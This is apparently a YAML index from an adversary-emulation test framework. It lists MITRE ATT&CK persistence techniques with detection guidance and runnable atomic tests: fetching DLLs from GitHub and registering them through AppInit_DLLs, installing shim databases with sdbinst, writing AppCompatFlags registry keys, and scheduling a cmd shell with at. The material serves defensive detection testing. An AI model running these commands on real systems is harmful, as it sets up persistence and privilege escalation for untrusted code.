Non-standard process execution trees may also indicate suspicious or malicious behavior + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'File: File Creation' + - 'File: File Modification' + x_mitre_platforms: + - Windows + - Office 365 + atomic_tests: [] + T1098.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1098.001 + url: https://attack.mitre.org/techniques/T1098/001 + - source_name: Microsoft SolarWinds Customer Guidance + url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/ + description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State + Cyber Attacks. Retrieved December 17, 2020. + - source_name: Blue Cloud of Death + url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1 + description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming + Azure. Retrieved October 23, 2019.' + - source_name: Blue Cloud of Death Video + url: https://www.youtube.com/watch?v=wQ1CuAPnrLM&feature=youtu.be&t=2815 + description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming + Azure. Retrieved November 21, 2019.' + - source_name: Demystifying Azure AD Service Principals + url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/ + description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service + Principals. Retrieved January 19, 2020. + - source_name: GCP SSH Key Add + url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add + description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved + October 1, 2020. + - source_name: Expel IO Evil in AWS + url: https://expel.io/blog/finding-evil-in-aws/ + description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding + Evil in AWS. 
Retrieved June 25, 2020. + - source_name: Expel Behind the Scenes + url: https://expel.io/blog/behind-the-scenes-expel-soc-alert-aws/ + description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020, + July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved + October 1, 2020.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Additional Cloud Credentials + description: |- + Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment. + + Adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals) + + In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes) + id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: 
'2021-03-08T10:33:01.582Z' + created: '2020-01-19T16:10:15.008Z' + x_mitre_contributors: + - Expel + - Oleg Kolesnikov, Securonix + - Jannie Li, Microsoft Threat Intelligence Center (MSTIC) + x_mitre_version: '2.2' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + - User + x_mitre_detection: |- + Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account. + + Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity. + x_mitre_data_sources: + - 'User Account: User Account Modification' + - 'Active Directory: Active Directory Object Modification' + x_mitre_platforms: + - IaaS + - Azure AD + atomic_tests: [] + T1546.009: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.009 + url: https://attack.mitre.org/techniques/T1546/009 + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + - url: https://forum.sysinternals.com/appcertdlls_topic12546.html + description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls. + Retrieved December 18, 2017. 
+ source_name: Sysinternals AppCertDlls Oct 2007 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: AppCert DLLs + description: "Adversaries may establish persistence and/or elevate privileges + by executing malicious content triggered by AppCert DLLs loaded into processes. + Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs + Registry key under HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session + Manager\\ are loaded into every process that calls the ubiquitously + used application programming interface (API) functions CreateProcess, + CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, + or WinExec. (Citation: Elastic Process Injection July 2017)\n\nSimilar + to [Process Injection](https://attack.mitre.org/techniques/T1055), this value + can be abused to obtain elevated privileges by causing a malicious DLL to + be loaded and run in the context of separate processes on the computer. Malicious + AppCert DLLs may also provide persistence by continuously being triggered + by API activity. " + id: attack-pattern--7d57b371-10c2-45e5-b3cc-83a8fb380e4c + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-11-10T18:29:31.052Z' + created: '2020-01-24T14:47:41.795Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_effective_permissions: + - Administrator + - SYSTEM + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_detection: "Monitor DLL loads by processes, specifically looking for + DLLs that are not recognized or not normally loaded into a process. Monitor + the AppCertDLLs Registry value for modifications that do not correlate with + known software, patch cycles, etc. 
Monitor and analyze application programming + interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx + and RegSetValueEx. (Citation: Elastic Process Injection July 2017) \n\nTools + such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting + location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls + Oct 2007)\n\nLook for abnormal process behavior that may be due to a process + loading a malicious DLL. Data and events should not be viewed in isolation, + but as part of a chain of behavior that could lead to other activities, such + as making network connections for Command and Control, learning details about + the environment through Discovery, and conducting Lateral Movement." + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'Module: Module Load' + x_mitre_platforms: + - Windows + atomic_tests: [] + T1546.010: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.010 + url: https://attack.mitre.org/techniques/T1546/010 + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + - url: https://support.microsoft.com/en-us/kb/197571 + description: Microsoft. (2006, October). Working with the AppInit_DLLs registry + value. Retrieved July 15, 2015. + source_name: AppInit Registry + - url: https://msdn.microsoft.com/en-us/library/dn280412 + description: Microsoft. (n.d.). AppInit DLLs and Secure Boot. Retrieved July + 15, 2015. + source_name: AppInit Secure Boot + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. 
(2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: AppInit DLLs + description: "Adversaries may establish persistence and/or elevate privileges + by executing malicious content triggered by AppInit DLLs loaded into processes. + Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs + value in the Registry keys HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows + NT\\CurrentVersion\\Windows or HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows + NT\\CurrentVersion\\Windows are loaded by user32.dll into every process + that loads user32.dll. In practice this is nearly every program, since user32.dll + is a very common library. (Citation: Elastic Process Injection July 2017)\n\nSimilar + to Process Injection, these values can be abused to obtain elevated privileges + by causing a malicious DLL to be loaded and run in the context of separate + processes on the computer. (Citation: AppInit Registry) Malicious AppInit + DLLs may also provide persistence by continuously being triggered by API activity. + \n\nThe AppInit DLL functionality is disabled in Windows 8 and later versions + when secure boot is enabled. 
(Citation: AppInit Secure Boot)" + id: attack-pattern--cc89ecbd-3d33-4a41-bcca-001e702d18fd + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-11-10T18:29:31.076Z' + created: '2020-01-24T14:52:25.589Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_system_requirements: + - Secure boot disabled on systems running Windows 8 and later + x_mitre_effective_permissions: + - Administrator + - SYSTEM + x_mitre_permissions_required: + - Administrator + x_mitre_detection: "Monitor DLL loads by processes that load user32.dll and + look for DLLs that are not recognized or not normally loaded into a process. + Monitor the AppInit_DLLs Registry values for modifications that do not correlate + with known software, patch cycles, etc. Monitor and analyze application programming + interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx + and RegSetValueEx. (Citation: Elastic Process Injection July + 2017)\n\nTools such as Sysinternals Autoruns may also be used to detect system + changes that could be attempts at persistence, including listing current AppInit + DLLs. (Citation: TechNet Autoruns) \n\nLook for abnormal process behavior + that may be due to a process loading a malicious DLL. Data and events should + not be viewed in isolation, but as part of a chain of behavior that could + lead to other activities, such as making network connections for Command and + Control, learning details about the environment through Discovery, and conducting + Lateral Movement." 
+ x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'Module: Module Load' + x_mitre_platforms: + - Windows + identifier: T1546.010 + atomic_tests: + - name: Install AppInit Shim + auto_generated_guid: a58d9386-3080-4242-ab5f-454c16503d18 + description: "AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs + to be loaded into each user mode process on the system. Upon succesfully execution, + \nyou will see the message \"The operation completed successfully.\" Each + time the DLL is loaded, you will see a message box with a message of \"Install + AppInit Shim DLL was called!\" appear.\nThis will happen regularly as your + computer starts up various applications and may in fact drive you crazy. A + reliable way to make the message box appear and verify the \nAppInit Dlls + are loading is to start the notepad application. Be sure to run the cleanup + commands afterwards so you don't keep getting message boxes showing up\n" + supported_platforms: + - windows + input_arguments: + registry_file: + description: Windows Registry File + type: Path + default: PathToAtomicsFolder\T1546.010\src\T1546.010.reg + registry_cleanup_file: + description: Windows Registry File + type: Path + default: PathToAtomicsFolder\T1546.010\src\T1546.010-cleanup.reg + dependency_executor_name: powershell + dependencies: + - description: 'Reg files must exist on disk at specified locations (#{registry_file} + and #{registry_cleanup_file}) + +' + prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) + {exit 0} else {exit 1} + +' + get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010.reg" -OutFile 
"#{registry_file}" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010-cleanup.reg" -OutFile "#{registry_cleanup_file}" + - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and + T1546.010x86.dll) + +' + prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) + {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010x86.dll" -OutFile C:\Tools\T1546.010x86.dll + executor: + command: 'reg.exe import #{registry_file} + +' + cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1 + +' + name: command_prompt + elevation_required: true + T1546.011: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.011 + url: https://attack.mitre.org/techniques/T1546/011 + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + - source_name: FireEye Application Shimming + url: http://files.brucon.org/2015/Tomczak_and_Ballenthin_Shims_for_the_Win.pdf + description: Ballenthin, W., Tomczak, J.. (2015). The Real Shim Shary. Retrieved + May 4, 2020. + - url: https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf + description: Pierce, Sean. (2015, November). Defending Against Malicious Application + Compatibility Shims. 
Retrieved June 22, 2017. + source_name: Black Hat 2015 App Shim + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Application Shimming + description: "Adversaries may establish persistence and/or elevate privileges + by executing malicious content triggered by application shims. The Microsoft + Windows Application Compatibility Infrastructure/Framework (Application Shim) + was created to allow for backward compatibility of software as the operating + system codebase changes over time. For example, the application shimming feature + allows developers to apply fixes to applications (without rewriting code) + that were created for Windows XP so that it will work with Windows 10. (Citation: + Elastic Process Injection July 2017)\n\nWithin the framework, shims are created + to act as a buffer between the program (or more specifically, the Import Address + Table) and the Windows OS. When a program is executed, the shim cache is referenced + to determine if the program requires the use of the shim database (.sdb). + If so, the shim database uses hooking to redirect the code as necessary in + order to communicate with the OS. \n\nA list of all shims currently installed + by the default Windows installer (sdbinst.exe) is kept in:\n\n* %WINDIR%\\AppPatch\\sysmain.sdb + and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\n\nCustom + databases are stored in:\n\n* %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom + and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo + keep shims secure, Windows designed them to run in user mode so they cannot + modify the kernel and you must have administrator privileges to install a + shim. 
However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) + (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data + Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), + and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims + may allow an adversary to perform several malicious acts such as elevate privileges, + install backdoors, disable defenses like Windows Defender, etc. (Citation: + FireEye Application Shimming) Shims can also be abused to establish persistence + by continuously being invoked by affected programs." + id: attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-11-10T18:29:31.094Z' + created: '2020-01-24T14:56:24.231Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: |- + There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim): + + * Shim-Process-Scanner - checks memory of every running process for any shim flags + * Shim-Detector-Lite - detects installation of custom shim databases + * Shim-Guard - monitors registry for any shim installations + * ShimScanner - forensic tool to find active shims in memory + * ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot) + + Monitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse. 
+ x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'Module: Module Load' + - 'File: File Modification' + x_mitre_platforms: + - Windows + identifier: T1546.011 + atomic_tests: + - name: Application Shim Installation + auto_generated_guid: 9ab27e22-ee62-4211-962b-d36d9a0e6a18 + description: "Install a shim database. This technique is used for privilege + escalation and bypassing user access control.\nUpon execution, \"Installation + of AtomicShim complete.\" will be displayed. To verify the shim behavior, + run \nthe AtomicTest.exe from the \\\\T1546.011\\\\bin + directory. You should see a message box appear\nwith \"Atomic Shim DLL Test!\" + as defined in the AtomicTest.dll. To better understand what is happening, + review\nthe source code files is the \\\\T1546.011\\\\src + directory.\n" + supported_platforms: + - windows + input_arguments: + file_path: + description: Path to the shim database file + type: String + default: PathToAtomicsFolder\T1546.011\bin\AtomicShimx86.sdb + dependency_executor_name: powershell + dependencies: + - description: 'Shim database file must exist on disk at specified location + (#{file_path}) + +' + prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} + +' + get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}" + - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll + +' + prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit + 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null + Invoke-WebRequest 
"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll + executor: + command: 'sdbinst.exe #{file_path} + +' + cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1 + +' + name: command_prompt + elevation_required: true + - name: New shim database files created in the default shim database directory + auto_generated_guid: aefd6866-d753-431f-a7a4-215ca7e3f13d + description: | + Upon execution, check the "C:\Windows\apppatch\Custom\" folder for the new shim database + + https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html + supported_platforms: + - windows + executor: + command: | + Copy-Item $PathToAtomicsFolder\T1546.011\bin\T1546.011CompatDatabase.sdb C:\Windows\apppatch\Custom\T1546.011CompatDatabase.sdb + Copy-Item $PathToAtomicsFolder\T1546.011\bin\T1546.011CompatDatabase.sdb C:\Windows\apppatch\Custom\Custom64\T1546.011CompatDatabase.sdb + cleanup_command: | + Remove-Item C:\Windows\apppatch\Custom\T1546.011CompatDatabase.sdb -ErrorAction Ignore + Remove-Item C:\Windows\apppatch\Custom\Custom64\T1546.011CompatDatabase.sdb -ErrorAction Ignore + name: powershell + elevation_required: true + - name: Registry key creation and/or modification events for SDB + auto_generated_guid: 9b6a06f9-ab5e-4e8d-8289-1df4289db02f + description: | + Create registry keys in locations where fin7 typically places SDB patches. Upon execution, output will be displayed describing + the registry keys that were created. These keys can also be viewed using the Registry Editor. 
+ + https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html + supported_platforms: + - windows + executor: + command: | + New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1546.011" -Value "AtomicRedTeamT1546.011" + New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1546.011" -Value "AtomicRedTeamT1546.011" + cleanup_command: | + Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1546.011" -ErrorAction Ignore + Remove-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1546.011" -ErrorAction Ignore + name: powershell + elevation_required: true + T1053.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1053.001 + url: https://attack.mitre.org/techniques/T1053/001 + - source_name: Kifarunix - Task Scheduling in Linux + url: https://kifarunix.com/scheduling-tasks-using-at-command-in-linux/ + description: Koromicha. (2019, September 7). Scheduling tasks using at command + in Linux. Retrieved December 3, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: At (Linux) + description: |- + Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux) + + An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. 
[at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account. + id: attack-pattern--6636bc83-0611-45a6-b74f-1f3daf635b8e + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-23T22:35:13.112Z' + created: '2019-12-03T12:59:36.749Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_remote_support: true + x_mitre_detection: "Monitor scheduled task creation using command-line invocation. + Legitimate scheduled tasks may be created during installation of new software + or through system administration functions. Look for changes to tasks that + do not correlate with known software, patch cycles, etc. \n\nSuspicious program + execution through scheduled tasks may show up as outlier processes that have + not been seen before when compared against historical data. Data and events + should not be viewed in isolation, but as part of a chain of behavior that + could lead to other activities, such as network connections made for Command + and Control, learning details about the environment through Discovery, and + Lateral Movement." + x_mitre_data_sources: + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'Process: Process Creation' + x_mitre_platforms: + - Linux + identifier: T1053.001 + atomic_tests: + - name: At - Schedule a job + auto_generated_guid: 7266d898-ac82-4ec0-97c7-436075d0d08e + description: 'This test submits a command to be run in the future by the `at` + daemon. 
+ +' + supported_platforms: + - linux + input_arguments: + time_spec: + description: Time specification of when the command should run + type: String + default: now + 1 minute + at_command: + description: The command to be run + type: String + default: echo Hello from Atomic Red Team + dependency_executor_name: sh + dependencies: + - description: 'The `at` and `atd` executables must exist in the PATH + +' + prereq_command: 'which at && which atd + +' + get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found + in the PATH (Package name: `at`)'' + +' + - description: 'The `atd` daemon must be running + +' + prereq_command: 'systemctl status atd || service atd status + +' + get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service + atd start` ; systemd: `systemctl start atd`)'' + +' + executor: + name: sh + elevation_required: false + command: 'echo "#{at_command}" | at #{time_spec} + +' + T1053.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1053.002 + url: https://attack.mitre.org/techniques/T1053/002 + - url: https://twitter.com/leoloobeek/status/939248813465853953 + description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved + December 12, 2017. + source_name: Twitter Leoloobeek Scheduled Task + - url: https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen + description: Satyajit321. (2015, November 3). Scheduled Tasks History Retention + settings. Retrieved December 12, 2017. + source_name: TechNet Forum Scheduled Task Operational Setting + - url: https://technet.microsoft.com/library/dd315590.aspx + description: Microsoft. (n.d.). General Task Registration. Retrieved December + 12, 2017. 
+ source_name: TechNet Scheduled Task Events + - source_name: Microsoft Scheduled Task Events Win10 + url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events + description: Microsoft. (2017, May 28). Audit Other Object Access Events. + Retrieved June 27, 2019. + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: At (Windows) + description: "Adversaries may abuse the at.exe utility to perform + task scheduling for initial or recurring execution of malicious code. The + [at](https://attack.mitre.org/software/S0110) utility exists as an executable + within Windows for scheduling tasks at a specified time and date. Using [at](https://attack.mitre.org/software/S0110) + requires that the Task Scheduler service be running, and the user to be logged + on as a member of the local Administrators group. \n\nAn adversary may use + at.exe in Windows environments to execute programs at system + startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) + can also be abused to conduct remote Execution as part of Lateral Movement + and or to run a process under the context of a specified account (such as + SYSTEM).\n\nNote: The at.exe command line utility has been deprecated + in current versions of Windows in favor of schtasks." 
+ id: attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-24T13:43:40.776Z' + created: '2019-11-27T13:52:45.853Z' + x_mitre_data_sources: + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_remote_support: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: |- + Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. + + Configure event logging for scheduled task creation and changes by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. 
(Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10) + + * Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered + * Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated + * Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted + * Event ID 4698 on Windows 10, Server 2016 - Scheduled task created + * Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled + * Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled + + Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns) + + Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. + x_mitre_platforms: + - Windows + identifier: T1053.002 + atomic_tests: + - name: At.exe Scheduled task + auto_generated_guid: 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 + description: | + Executes cmd.exe + Note: deprecated in Windows 8+ + + Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task that will spawn cmd at a specific time. 
+ supported_platforms: + - windows + executor: + name: command_prompt + elevation_required: false + command: 'at 13:20 /interactive cmd + +' + T1547.002: + technique: + id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec + description: |- + Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages) + + Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ with the key value of "Authentication Packages"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded. + name: Authentication Package + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1547.002 + url: https://attack.mitre.org/techniques/T1547/002 + - url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx + description: Microsoft. (n.d.). Authentication Packages. Retrieved March 1, + 2017. + source_name: MSDN Authentication Packages + - url: http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html + description: Graeber, M. (2014, October). Analysis of Malicious Security Support + Provider DLLs. Retrieved March 1, 2017. + source_name: Graeber 2014 + - url: https://technet.microsoft.com/en-us/library/dn408187.aspx + description: Microsoft. (2013, July 31). Configuring Additional LSA Protection. + Retrieved June 24, 2015. 
